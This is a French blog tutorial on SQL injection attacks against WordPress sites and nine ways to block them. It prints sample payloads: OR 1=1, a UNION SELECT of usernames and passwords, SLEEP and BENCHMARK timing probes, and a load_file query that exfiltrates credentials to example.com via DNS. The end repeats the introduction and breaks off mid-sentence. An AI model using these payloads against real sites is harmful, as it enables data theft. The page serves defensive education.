![\"\"](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/eBook_-Build-website-FR-1024x283-1.png\/public\")
<\/a><\/figure>Introduction à l’injection SQL<\/strong><\/h2>Avant de nous plonger dans l’injection SQL, il est important de comprendre ce qu’est le langage SQL. En bref, le langage de requête structuré (« Structured Query Language », SQL) est un langage de programmation<\/strong> utilisé pour interagir avec les bases de données.<\/p>Dans WordPress, vous pouvez utiliser des requêtes SQL<\/strong> pour demander des données à votre base de données MySQL. Vous pouvez modifier les tables, ajouter de nouvelles données et trier les résultats des données à l’aide de différentes commandes.<\/p>Quand on parle d’injection SQL (SQLi), cela signifie qu’un code malveillant est injecté dans une application web. Les attaquants peuvent accéder aux données de la base de données à l’aide d’instructions SQL nuisibles et même les détruire.<\/p>
Les attaques par injection SQL se produisent depuis la fin des années 90 et restent un problème courant. En 2023, cette technique figurait en troisième position sur la liste des dix principaux risques pour la sécurité des applications web<\/strong>.<\/p>Bien qu’il s’agisse d’un problème important, de nombreux sites et applications web ne mettent pas en œuvre de mesures efficaces pour prévenir les attaques par injection SQL. Cela a conduit à plusieurs violations de données, parfois à grande échelle. Par exemple, l’université de Stanford a subi une cyberattaque en 2020<\/strong> qui a compromis les données de nombreux étudiants.<\/p>En fin de compte, l’injection SQL de WordPress peut avoir des conséquences désastreuses pour votre site web. Si vous ne voulez pas que vos données tombent entre de mauvaises mains, il est donc crucial de renforcer votre sécurité en ligne autant que possible.<\/p>
Comment fonctionne l’injection SQL sur WordPress<\/strong><\/h2>Les attaques par injection SQL peuvent être réalisées de différentes manières. Elles peuvent impliquer :<\/p>
\n- La récupération non autorisée de données<\/strong>. Les attaquants peuvent manipuler une requête SELECT pour récupérer des données et « vider » le contenu d’une base de données.<\/li>\n\n\n\n
- La modification des données<\/strong>. Une SQLi peut être utilisée pour modifier les entrées d’une base de données ou les autorisations d’un compte.<\/li>\n\n\n\n
- Un déni de service (DoS)<\/strong>. Les attaques DoS empêchent les utilisateurs réels de visiter votre site web. Les attaquants y parviennent en supprimant massivement le contenu de votre base de données.<\/li>\n<\/ul>
Il y a de fortes chances que votre site web contienne un formulaire qui recueille des informations auprès des visiteurs. Les pirates peuvent s’en servir pour contourner les mesures de sécurité de votre site web<\/a>.<\/strong><\/p>Si vous demandez à un utilisateur de saisir un nom d’utilisateur, un mot de passe ou un numéro de téléphone, il peut vous donner une instruction SQL malveillante à la place. Celle-ci s’exécutera à votre insu dans votre base de données, ce qui risque d’exposer les données de votre site.<\/p>
Voici quelques points d’entrée courants pour les attaques SQLi :<\/p>
\n- Les formulaires d’inscription<\/li>\n\n\n\n
- Les formulaires de connexion<\/li>\n\n\n\n
- Les champs des commentaires<\/li>\n\n\n\n
- Les paniers d’achat<\/li>\n\n\n\n
- Les formulaires de contact<\/strong><\/li>\n<\/ul>
Voici un exemple d’instruction SQL normale pour sélectionner un utilisateur spécifique avec un ID utilisateur donné :<\/p>
\ntxtUserId = getRequestString(\"UserId\");<\/pre>\n\n\n\ntxtSQL = \"SELECT * FROM Users WHERE UserId = \" + txtUserId;<\/pre>\n<\/div><\/div>Sans aucune directive sur les entrées utilisateur, les attaquants SQLi peuvent modifier cette déclaration :<\/p>
SELECT * FROM Users WHERE UserId = 105 OR 1=1;<\/pre>Cela renverra toutes les lignes de la table « Utilisateurs <\/strong>», exposant ainsi les informations de vos visiteurs. Les attaquants peuvent également potentiellement accéder aux mots de passe :<\/p>SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;<\/pre>En utilisant l’injection SQL, les pirates peuvent découvrir les noms d’utilisateur et les mots de passe de votre site web. Si vous gérez un site de e-commerce par exemple, ces personnes malveillantes peuvent divulguer les données de paiement de vos clients et d’autres informations sensibles, ruinant ainsi votre réputation en ligne.<\/p>
Les types d’attaques par injection SQL<\/strong><\/h2>Maintenant que vous savez ce qu’est une injection SQL et comment elle fonctionne, examinons les différentes façons dont elle peut être exécutée. Vous serez ainsi mieux préparé pour vous défendre.<\/p>
SQLi en bande (In-Band)<\/strong><\/h3>Un exemple d’attaque par injection de code SQL est le SQLi en bande. Avec cette méthode, l’attaquant peut utiliser le même canal pour insérer un code malveillant et recueillir les résultats.<\/p>
Comme le SQLi en bande est simple et efficace, il s’agit d’un type d’injection SQL très répandu. Cependant, il existe deux variantes de SQLi en bande – basée sur les erreurs<\/strong> et basée sur l’union<\/strong>.<\/p>SQLi basée sur les erreurs<\/strong><\/p>Une attaque par injection SQL basée sur les erreurs est une technique qui force la base de données à produire des messages d’erreur<\/strong><\/a>. Cela permet d’obtenir des informations sur la structure de la base de données.<\/p>Les attaquants peuvent y parvenir en utilisant une commande SQL dans un paramètre de champ d’entrée. Il peut s’agir d’un simple guillemet, d’un double guillemet ou d’opérateurs tels que AND, OR ou NOT.<\/p>
Par exemple, l’URL d’un site peut prendre un paramètre des visiteurs :<\/p>
https:\/\/www.example.org\/index.php?item=123<\/pre>Dans ce cas, les attaquants peuvent ajouter un guillemet simple à la fin du paramètre :<\/p>
https:\/\/www.example.org\/index.php?item=123′<\/pre>Ce qui peut renvoyer une erreur contenant des informations sensibles :<\/p>
Vous avez une erreur dans votre syntaxe SQL ; consultez le manuel correspondant à la version de votre serveur MySQL pour connaître la bonne syntaxe à utiliser près de »VALUE ».<\/p>
Voici les informations qu’un pirate peut obtenir à partir de cette erreur :<\/p>
\n- La confirmation que la base de données utilise MySQL<\/li>\n\n\n\n
- La syntaxe spécifique qui a provoqué l’erreur<\/li>\n\n\n\n
- L’endroit de la requête où l’erreur s’est produite<\/li>\n<\/ul>
Après avoir reçu cette erreur, les attaquants SQLi sauront que votre base de données n’est pas sécurisée. Cela peut leur permettre de planifier d’autres attaques par injection afin d’obtenir des données plus sensibles. Ils peuvent même utiliser une commande comme grep extract pour automatiser les options de syntaxe SQL afin de localiser d’autres erreurs.<\/p>
SQLi basée sur l’union<\/strong><\/p>Une attaque par injection SQL basée sur l’union est une technique qui utilise l’opérateur SQL UNION pour combiner deux ou plusieurs instructions SELECT dans une réponse HTTP<\/strong>. Cette réponse peut contenir des données sensibles qui peuvent être exploitées.<\/p>Essentiellement, les attaquants utilisent le mot-clé SQL UNION pour obtenir des données supplémentaires par rapport à ce qui a été récupéré dans une requête initiale. Ce mot-clé permet aux pirates d’ajouter des requêtes SELECT supplémentaires à la requête initiale.<\/p>
Voici comment elle peut être exécutée :<\/p>
SELECT a, b FROM table1 UNION SELECT c, d FROM table2<\/p>
Cette requête renverra les valeurs de deux colonnes dans un seul ensemble de résultats. Celui-ci contiendra les valeurs des colonnes A et B d’une table, ainsi que les colonnes C et D d’une autre table.<\/p>
Pour que cette injection SQL fonctionne, quelques conditions doivent être remplies :<\/p>
\n- Chaque requête doit renvoyer le même nombre de colonnes.<\/li>\n\n\n\n
- Le type de données de chaque colonne doit être compatible avec les requêtes.<\/li>\n<\/ul>
Si ces deux conditions sont remplies, les attaquants seront en mesure de récupérer les résultats de leur requête injectée. Après avoir déterminé le nombre de colonnes nécessaires et le type de données de l’utilisateur, les pirates SQLi peuvent ensuite récupérer le contenu des tables de votre base de données.<\/p>
Par exemple, la requête originale peut renvoyer deux colonnes contenant des données de type chaîne. Si ces colonnes correspondent à des noms d’utilisateur et à des mots de passe, les pirates peuvent soumettre cette entrée :<\/p>
‘ UNION SELECT username, password FROM users–<\/p>
Comme vous pouvez l’imaginer, les résultats de ces requêtes peuvent avoir des conséquences désastreuses. Les informations personnelles contenues sur votre site web peuvent alors être consultées et exploitées de diverses manières.<\/p>
SQLi inférentiel (inferential)<\/strong><\/h3>L’injection SQL inférentielle est communément appelée SQLi aveugle. Contrairement aux attaques en bande, aucune donnée n’est transférée entre l’application et le pirate. Au lieu de cela, l’attaquant envoie plusieurs requêtes à la base de données afin d’observer le comportement des réponses.<\/p>
En résumé, l’attaque SQLi inférentielle consiste à évaluer la structure d’une base de données en notant la façon dont elle répond à des données spécifiques. Pour ce faire, les attaquants peuvent utiliser des techniques d’injection SQL basées sur les booléens et sur le temps.<\/p>
SQLi booléenne<\/strong><\/p>La méthode d’injection basée sur les booléens est un type de SQLi inférentiel. Un attaquant interroge la base de données avec des questions de type VRAI ou FAUX et évalue la réponse. Cette technique est souvent utilisée lorsque l’application n’affiche que des messages d’erreur génériques.<\/p>
L’injection booléenne prend beaucoup plus de temps pour atteindre son objectif. Comme la base de données n’envoie pas de données à la page web, l’attaquant vole des données en examinant les réponses aux questions VRAI ou FAUX. Cela peut lui permettre de savoir si la base de données est vulnérable à une injection SQL aveugle.<\/p>
Par exemple, les pirates peuvent injecter une requête malveillante qui renvoie un résultat FAUX :<\/p>
http:\/\/example.com\/items.php?id=2 and 1=2<\/pre>Si l’application ne renvoie pas de résultat, elle est probablement vulnérable à l’injection SQL. Pour s’en assurer, les attaquants injectent généralement des requêtes qui renvoient un résultat VRAI :<\/p>
http:\/\/newspaper.com\/items.php?id=2 and 1=1<\/pre>L’attaquant peut distinguer les retours VRAI et FAUX lorsque le contenu est différent pour chaque réponse. Cela peut lui permettre d’exploiter la base de données.<\/p>
SQLi basée sur le temps<\/strong><\/p>Une autre façon de déterminer si une base de données est vulnérable à une injection SQL est d’utiliser une attaque basée sur le temps. Ce type d’injection force un délai avant l’exécution des requêtes.<\/p>
En fonction du temps de réponse, les attaquants peuvent évaluer si le résultat est VRAI ou FAUX. La connaissance de cette information peut leur permettre d’exécuter des requêtes supplémentaires.<\/p>
Si une attaque basée sur le temps est effectuée sur une base de données MySQL, elle utilise probablement la fonction sleep. Cette fonction demande à la base de données de retarder l’exécution de la requête pendant un certain temps :<\/p>
select * from comments<\/pre>WHERE post_id=1-SLEEP(15);<\/pre>Lorsque la réponse est retardée avec succès, l’attaquant sait alors que l’injection SQL est possible. Cela confirmera que le serveur web est une base de données MySQL, ce qui conduira à des injections de charge utile plus complexes.<\/p>
Par exemple, les attaquants peuvent utiliser ce délai pour confirmer les données dans une base de données. Ils peuvent énumérer chaque lettre en demandant à la base de données de s’arrêter pendant un certain temps.<\/p>
Pour les bases de données MySQL, vous pouvez implémenter l’opération BENCHMARK() pour retarder les réponses si l’expression est vraie. Voici un exemple de fonctionnement :<\/p>
1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;<\/pre>S’il y a un délai important dans la réponse, les attaquants peuvent supposer que le premier caractère du mot de passe pour user_id = 1 est le caractère “2”. En utilisant cette méthode, ils peuvent énumérer tous les mots de passe stockés dans votre base de données.<\/p>
SQLi hors bande (Out-of-Band)<\/strong><\/h3>Une injection SQL hors bande signifie que l’attaquant n’a pas pu recevoir de réponse de l’injection sur le même canal que celui qu’il a demandé. Au lieu de cela, il peut forcer l’application à envoyer les données demandées à un point de terminaison distant et contrôlé.<\/p>
Souvent, l’injection SQL hors bande peut être une alternative efficace aux attaques inférentielles. Toutefois, cette technique n’est possible que si le serveur dispose de commandes qui déclenchent des requêtes DNS ou HTTP. Heureusement pour eux, ces commandes sont courantes sur les serveurs SQL les plus répandus.<\/p>
Le serveur MySQL 5.5.52 et les versions inférieures démarrent automatiquement avec une variable système globale secure_file_priv<\/strong> vide. Dans ce cas, les attaquants hors bande peuvent exfiltrer les données et créer une requête vers un nom de domaine avec une fonction load_file<\/strong>. Cela permettra de récupérer les données exfiltrées dans la requête.<\/p>Les pirates peuvent y parvenir en exécutant cette requête SQL :<\/p>
SELECT load_file(CONCAT('\\\\\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\\\test.txt'))<\/pre>En conséquence, l’application enverra une requête DNS au domaine inclus. Cela peut exposer des détails sensibles tels que la version de votre base de données, les noms d’utilisateur et les mots de passe.<\/p>
Quelle est la fréquence des attaques d’injection SQL sur WordPress ?<\/strong><\/h2>Si vous construisez un site WordPress, il est important de savoir si vous devez vous préoccuper de l’injection SQL. Malheureusement, l’injection SQL est un moyen assez courant pour les pirates de compromettre ce système de gestion de contenu (CMS)<\/strong><\/a>.<\/p>Selon le rapport iThemes sur la vulnérabilité de WordPress<\/strong><\/a>, les attaques par injection SQL représentaient 9,3 % de toutes les menaces de sécurité en 2021. Bien que des facteurs tels que les requêtes de script et de falsification intersites aient été plus fréquents, il est impératif de ne pas négliger les menaces SQLi.<\/p>WordPress stocke toutes les informations de votre site web dans une base de données SQL. Cela inclut vos commentaires, vos articles, les informations sur vos clients, et bien plus encore. De plus, WordPress fonctionne en PHP<\/strong>, qui s’intègre à SQL. Étant donné que SQL fait partie intégrante de WordPress, vous êtes certainement vulnérable aux attaques par injection SQL.<\/p>En général, l’injection SQL sur WordPress est exécutée par le biais de formulaires. Les attaquants peuvent exploiter ce processus lorsque les utilisateurs soumettent des données à un script PHP contenant une requête SQL. En tant que propriétaire d’un site WordPress, il est important de maximiser votre sécurité pour éviter ce problème.<\/p>
\n![\"\"](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/public\")
<\/a><\/figure><\/div>Comment bloquer l’injection SQL dans WordPress (9 méthodes)<\/strong><\/h2>Si votre site web présente une vulnérabilité aux injections SQL, cela signifie que les attaquants peuvent accéder, modifier ou supprimer des données dans votre base de données. Heureusement, vous pouvez mettre en œuvre plusieurs pratiques de sécurité pour augmenter la sécurité de WordPress<\/strong><\/a> et éviter une attaque SQL.<\/p>1. Mettez en place un pare-feu<\/strong><\/h3>L’une des meilleures façons de sécuriser votre site web contre les attaques SQLi est de mettre en place un pare-feu d’application web (WAF). Un pare-feu est un système de sécurité qui surveille le trafic réseau et bloque les activités suspectes. Il peut protéger votre site contre les injections SQL, les falsifications intersites, les scripts intersites, l’inclusion de fichiers, etc.<\/p>
Cloudflare<\/strong><\/a> est un service gratuit qui fournit un pare-feu d’application web puissant pour votre site internet. Cet outil peut détecter automatiquement plusieurs variantes d’attaques SQLi.<\/p>\n![\"Page](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Cloudflare-application-web.png\/public\")
<\/figure><\/div>2. Changez le préfixe de la base de données de WordPress<\/strong><\/h3>Lorsque vous installez WordPress<\/strong><\/a>, pour la première fois, le préfixe de la base de données est automatiquement “wp_.”<\/strong> Cette option par défaut peut faciliter l’accès des pirates à vos données. Si vous ne réinitialisez pas le préfixe, les pirates peuvent facilement deviner les tables de votre base de données.<\/p>Vous pouvez rapidement modifier le préfixe de votre base de données, mais n’oubliez pas de faire une sauvegarde de votre site WordPress<\/strong><\/a> au préalable :<\/p>\n- Si vous avez un compte Hostinger, connectez-vous au tableau de bord hPanel et ouvrez votre gestionnaire de fichiers<\/strong>.<\/li>\n<\/ul>\n
![\"La](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-dashboard-filemanager-highlighted-fr.png\/public\")
<\/figure><\/div>\n- Cliquez sur le dossier public_html <\/strong>et ouvrez le fichier wp-config.php<\/strong>.<\/li>\n<\/ul>\n
![\"Gestionnaire](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/05\/gestionnaire-de-fichiers-wpconfig-selectionne.png\/public\")
<\/figure><\/div>\n- Recherchez la valeur $table_prefix. Elle doit être définie sur “wp_.”<\/li>\n<\/ul>\n
![\"Recherche](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/table-prefix-value-dans-fichier-wp-config-php.png\/public\")
<\/figure><\/div>\n- Vous pouvez supprimer ce préfixe et en saisir un nouveau. Veillez à n’utiliser qu’une combinaison de lettres, de chiffres et de traits de soulignement. Enfin, enregistrez et fermez le fichier.<\/li>\n\n\n\n
- Retournez dans le hPanel et trouvez la section Bases de données<\/strong>. Cliquez ensuite sur phpMyAdmin<\/strong>.<\/li>\n<\/ul>\n
![\"Le](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-sidebar-fr.png\/public\")
<\/figure><\/div>\n- Sur la page suivante, sélectionnez Enter phpMyAdmin<\/strong>. Cela ouvrira la base de données de votre site.<\/li>\n<\/ul>\n
![\"La](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-databases-phpmyadmin-fr.png\/public\")
<\/figure><\/div>\n- Dans phpMyAdmin, cliquez sur l’onglet SQL<\/strong>. Pour modifier le préfixe de votre base de données, entrez cette requête dans la zone de texte :<\/li>\n<\/ul>
RENAME table `wp_tablename` TO `wp_1secure1_tablename`;<\/p>
Veillez à remplacer « wp_tablename »<\/strong> par le nom de votre table actuelle. Ensuite, « wp_1secure1_tablename »<\/strong> devrait avoir votre nouveau préfixe et nom de table.<\/p>\n![\"Modifier](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/modifier-wp_tablename-and-wp_1secure1_tablename-valeurs-sur-phpMyAdmin.png\/public\")
<\/figure><\/div>\n- Vous devrez répéter ce code pour chaque table que vous souhaitez renommer. Lorsque vous avez terminé, sélectionnez Go<\/strong>.<\/li>\n<\/ul>
En outre, il se peut que vous deviez mettre à jour certaines valeurs de préfixe manuellement. Dans ce cas, vous pouvez filtrer vos valeurs pour trouver toutes les instances de l’ancien préfixe :<\/p>
SELECT * FROM `wp_1secure1_tablename` WHERE `field_name` LIKE '%wp_%'<\/pre>Vous pouvez ensuite modifier chaque résultat pour qu’il contienne la nouvelle valeur du préfixe. Cela devrait supprimer complètement le préfixe « wp_ » de votre base de données.<\/p>
3. Validez les entrées des utilisateurs<\/strong><\/h3>Comme nous l’avons mentionné précédemment, les pirates informatiques exécutent généralement des attaques SQLi en exploitant les données soumises par l’utilisateur. Il est donc important de sécuriser tous les champs d’entrée de votre site web, y compris les formulaires et les sections de commentaires.<\/p>
Vous pouvez filtrer toutes les commandes soumises par les utilisateurs à l’aide de la validation<\/strong><\/a> et de l’assainissement des entrées. Vous pouvez protéger efficacement votre site web contre les injections SQL en vous assurant que les formulaires ne contiennent pas de chaînes de caractères supplémentaires ou de code malveillant.<\/p>Pour créer une validation d’entrée pour vos formulaires, vous devez établir des règles pour les entrées des utilisateurs. Si vous utilisez un générateur de formulaires tel que Formidable Forms<\/strong><\/a>, vous pouvez créer un format de masque d’entrée<\/strong>. Cela limitera la saisie à un ensemble spécifique de symboles.<\/p>\n![\"Création](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Formidable-Forms-1024x446-1.png\/public\")
<\/figure><\/div>Vous pouvez également envisager d’inclure uniquement des menus déroulants et des options à choix multiples. Le fait d’éviter les zones de texte peut empêcher les pirates d’exploiter les données de votre formulaire.<\/p>
La validation des données peut également être effectuée à l’aide de fonctions. Par exemple, si vous souhaitez limiter les soumissions aux seuls codes postaux américains valides, voici la fonction que vous pouvez utiliser :<\/p>
\n\n\n\n\/**\n\n * Validate a US zip code.\n\n *\n\n * @param string $zip_code RAW zip code to check.\n\n *\n\n * @return bool true if valid, false otherwise.\n\n *\/\n\nfunction wporg_is_valid_us_zip_code( $zip_code ) {\n\n \/\/ Scenario 1: empty.\n\n if ( empty( $zip_code ) ) {\n\n return false;\n\n }\n\n \/\/ Scenario 2: more than 10 characters.\n\n if ( 10 < strlen( trim( $zip_code ) ) ) {\n\n return false;\n\n }\n\n \/\/ Scenario 3: incorrect format.\n\n if ( ! preg_match( '\/^\\d{5}(\\-?\\d{4})?$\/', $zip_code ) ) {\n\n return false;\n\n }\n\n \/\/ Passed successfully.\n\n return true;\n\n}<\/pre>\n<\/blockquote>\n<\/div>\n<\/div>\n<\/blockquote>Ce code évaluera le champ wporg_zip_code pour chaque soumission en fonction de ces règles prédéfinies. Ensuite, il n’effectuera l’action que si le code postal est valide :<\/p>
if ( isset( $_POST['wporg_zip_code'] ) && wporg_is_valid_us_zip_code( $_POST['wporg_zip_code'] ) ) {\n\n \/\/ your action\n\n}<\/pre>Pour nettoyer davantage les données soumises par les utilisateurs, vous pouvez assainir chaque entrée. Si vous souhaitez assainir une adresse électronique, vous pouvez utiliser la fonction suivante :<\/p>
function sanitize_email( $email ) {\n\n \/\/ Test for the minimum length the email can be.\n\n if ( strlen( $email ) < 6 ) {<\/pre>S’il y a des caractères supplémentaires qui ne sont pas inclus dans une adresse électronique standard, cette fonction les supprimera. Vous ne recevrez alors que des adresses électroniques valides et assainies.<\/p>
4. Effectuez des mises à jour fréquentes<\/strong><\/h3>Lorsque vous essayez de sécuriser votre site web, pensez à utiliser les logiciels les plus récents. Si vous vous contentez d’un logiciel de base, et que vous utilisez des thèmes et des plugins obsolètes, il y a de grandes chances que votre site internet soit vulnérable. L’utilisation d’une ancienne version de WordPress présentera probablement des failles de sécurité qui pourront être exploitées.<\/p>
Pour vérifier la présence de nouvelles mises à jour, ouvrez votre tableau de bord et cliquez sur l’onglet Mises à jour<\/strong>. Vous pouvez y mettre à jour votre site web<\/strong> avec la dernière version de WordPress.<\/p>\n![Vérification de la dernière version de WordPress avec un bouton \"Mise à jour vers la version 6.0.2\" présent](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-updates-pending-fr-1.png\/public\")
<\/figure><\/div>Vous pouvez également lancer des mises à jour pour les plugins et les thèmes. Toutefois, vous pouvez activer les mises à jour automatiques<\/strong> si vous ne souhaitez pas mettre à jour manuellement chaque plugin de votre site web. Pour ce faire, rendez-vous sur votre page Plugins<\/strong>. Sélectionnez ensuite l’option Activer les mises à jour automatiques<\/strong> sur le côté droit de chaque plugin.<\/p>\n![\"Mises](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-plugins-updates-pending-fr.png\/public\")
<\/figure><\/div>Vous pouvez également mettre à jour automatiquement le logiciel principal de WordPress. Pour ce faire, il vous suffit d’ajouter un peu de code à votre fichier wp-config.php<\/strong> :<\/p>define('WP_AUTO_UPDATE_CORE', true);<\/pre>Vous pouvez désormais vous assurer que votre site utilise toujours le logiciel le plus récent. Grâce aux nouveaux correctifs de sécurité et aux corrections de bogues, vous n’aurez plus à vous soucier des vulnérabilités de votre codage.<\/p>
5. Installez un plugin d’injection SQL pour WordPress<\/strong><\/h3>Souvent, l’un des moyens les plus simples de prévenir les injections SQL est d’installer un plugin de sécurité WordPress<\/strong><\/a>. En tant que débutant, vous pouvez ainsi protéger efficacement votre site web sans avoir à modifier le code ou à effectuer d’autres tâches avancées.<\/p>Examinons quelques-uns des plugins de sécurité les plus puissants du marché.<\/p>
Sucuri<\/strong><\/p>Sucuri Security<\/strong><\/a> est l’un des plugins de sécurité les plus populaires, avec plus de 800 000 installations actives. Cet outil peut protéger votre site web contre les injections SQL grâce à l’analyse des logiciels malveillants, aux notifications de sécurité et à un pare-feu.<\/p>\n![\"Bannière](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Securi-Security-banniere.png\/public\")
<\/figure><\/div>Caractéristiques <\/strong>:<\/p>\n- Analyse à distance des logiciels malveillants<\/li>\n\n\n\n
- Surveillance de l’intégrité des fichiers<\/li>\n\n\n\n
- Audits de sécurité concernant l’activité<\/li>\n\n\n\n
- Actions de sécurité post-piratage<\/li>\n<\/ul>
Vous pourrez consulter les journaux d’audit de sécurité de votre site web même avec la version de base de WordPress. Sucuri analysera vos fichiers principaux, notera toute activité suspecte et recommandera des actions spécifiques pour améliorer votre sécurité:<\/p>
\n![\"Securi](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-sucuri-fr.png\/public\")
<\/figure><\/div>L’une des principales caractéristiques de Sucuri est son pare-feu. Il inspecte tout le trafic HTTP et HTTPS avant qu’il n’entre en contact avec votre serveur. Grâce à la détection de signatures de haute qualité, Sucuri peut bloquer toutes les requêtes malveillantes avant qu’elles ne causent des dommages.<\/p>
La version premium de Sucuri peut fournir un nombre illimité de suppressions de logiciels malveillants par ses propres experts en sécurité. Vous aurez également accès à des analyses de sécurité avancées, à une atténuation des attaques DDoS et à un réseau de diffusion de contenu (CDN)<\/strong>.<\/p>Prix <\/strong>: Sucuri Security est un plugin WordPress gratuit. Cependant, si vous souhaitez accéder au pare-feu d’applications web, vous devrez acheter un plan premium<\/strong><\/a> disponible à partir de 199.99 $\/an<\/strong>.<\/p>MalCare<\/strong><\/p>MalCare<\/strong><\/a> est un autre outil efficace pour la prévention de SQLi. Ce plugin WordPress peut effectuer une recherche approfondie de logiciels malveillants sur votre site web et vous avertir de toute vulnérabilité. Avec MalCare, vous pouvez automatiquement nettoyer votre site et éviter de nombreux problèmes de sécurité WordPress<\/strong><\/a> permettant une injection SQL.<\/p>\n![\"Bannière](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare.png\/public\")
<\/figure><\/div>Caractéristiques <\/strong>:<\/p>\n- Scanner de logiciels malveillants basé sur le cloud<\/li>\n\n\n\n
- Alertes sur les risques de sécurité<\/li>\n\n\n\n
- Suppression des logiciels malveillants en un clic<\/li>\n\n\n\n
- Identifie et bloque le trafic malveillant<\/li>\n<\/ul>
Après avoir installé la version gratuite vous pourrez mettre en place une protection en temps réel contre les logiciels malveillants. MalCare analyse d’abord votre site web et vous donne un état de sécurité. Il continuera ensuite à effectuer des analyses quotidiennes des logiciels malveillants<\/p>
\n![\"tableau](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/MalCare-WordPress-security-plugin-tableau-de-bord.png\/public\")
<\/figure><\/div>Contrairement à Sucuri, MalCare implémente un pare-feu gratuit sur votre site web. Celui-ci peut bloquer les injections SQL, ainsi que les attaques par scripts intersites. Il fournit également une protection de la connexion, protégeant votre site contre les attaques par force brute.<\/p>
Étant donné que le tableau de bord MalCare affiche des analyses pour plusieurs sites, ce plugin peut être un outil précieux pour les développeurs. Vous pouvez rapidement détecter et résoudre les problèmes de sécurité grâce aux rapports en temps réel.<\/p>
Prix <\/strong>: Vous pouvez télécharger MalCare gratuitement. Si vous avez besoin d’un nettoyeur de logiciels malveillants automatisé ou de l’aide d’experts en sécurité, le plugin premium<\/strong><\/a> commence à 99 $\/an<\/strong>.<\/p>Jetpack<\/strong><\/p>Jetpack<\/strong><\/a> peut être une option efficace si vous recherchez un plugin tout-en-un que vous pouvez utiliser pour gérer les performances de votre site. Cet outil vous permet de renforcer la sécurité, le marketing, la conception et la vitesse du site<\/strong><\/a>.<\/p>\n![\"bannière](\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Jetpack.png\/public\")
<\/figure><\/div>Caractéristiques <\/strong>:<\/p>\n- Sauvegardes automatiques<\/li>\n\n\n\n
- Analyse des logiciels malveillants<\/li>\n\n\n\n
- Prévention des attaques par force brute<\/li>\n\n\n\n
- Surveillance des temps d’arrêt (ou d’indisponibilité)<\/li>\n<\/ul>
Vous pouvez surveiller en permanence votre site web pour détecter toute injection SQL potentielle grâce à l’analyse des logiciels malveillants. À titre préventif, vous pouvez sauvegarder les fichiers de votre site et ainsi facilement récupérer les données après une attaque.<\/p>
Jetpack peut également améliorer la diffusion de votre contenu car il est fourni avec un CDN gratuit qui optimise automatiquement vos images <\/strong>pour un chargement rapide. En d’autres termes, vous protégez votre site web des injections SQL et vous vous assurez que les visiteurs bénéficient d’une bonne expérience.<\/p>Prix <\/strong>: Jetpack est un plugin WordPress gratuit. Jetpack Security<\/strong><\/a> commence à 10 $\/mois<\/strong> pour la détection des logiciels malveillants en temps réel et les sauvegardes.<\/p>6. Limitez les privilèges d’accès des utilisateurs<\/strong><\/h3>
Dans WordPress, vous pouvez utiliser des requêtes SQL<\/strong> pour demander des données à votre base de données MySQL. Vous pouvez modifier les tables, ajouter de nouvelles données et trier les résultats des données à l’aide de différentes commandes.<\/p> Quand on parle d’injection SQL (SQLi), cela signifie qu’un code malveillant est injecté dans une application web. Les attaquants peuvent accéder aux données de la base de données à l’aide d’instructions SQL nuisibles et même les détruire.<\/p> Les attaques par injection SQL se produisent depuis la fin des années 90 et restent un problème courant. En 2023, cette technique figurait en troisième position sur la liste des dix principaux risques pour la sécurité des applications web<\/strong>.<\/p> Bien qu’il s’agisse d’un problème important, de nombreux sites et applications web ne mettent pas en œuvre de mesures efficaces pour prévenir les attaques par injection SQL. Cela a conduit à plusieurs violations de données, parfois à grande échelle. Par exemple, l’université de Stanford a subi une cyberattaque en 2020<\/strong> qui a compromis les données de nombreux étudiants.<\/p> En fin de compte, l’injection SQL de WordPress peut avoir des conséquences désastreuses pour votre site web. Si vous ne voulez pas que vos données tombent entre de mauvaises mains, il est donc crucial de renforcer votre sécurité en ligne autant que possible.<\/p> Les attaques par injection SQL peuvent être réalisées de différentes manières. Elles peuvent impliquer :<\/p> Il y a de fortes chances que votre site web contienne un formulaire qui recueille des informations auprès des visiteurs. Les pirates peuvent s’en servir pour contourner les mesures de sécurité de votre site web<\/a>.<\/strong><\/p> Si vous demandez à un utilisateur de 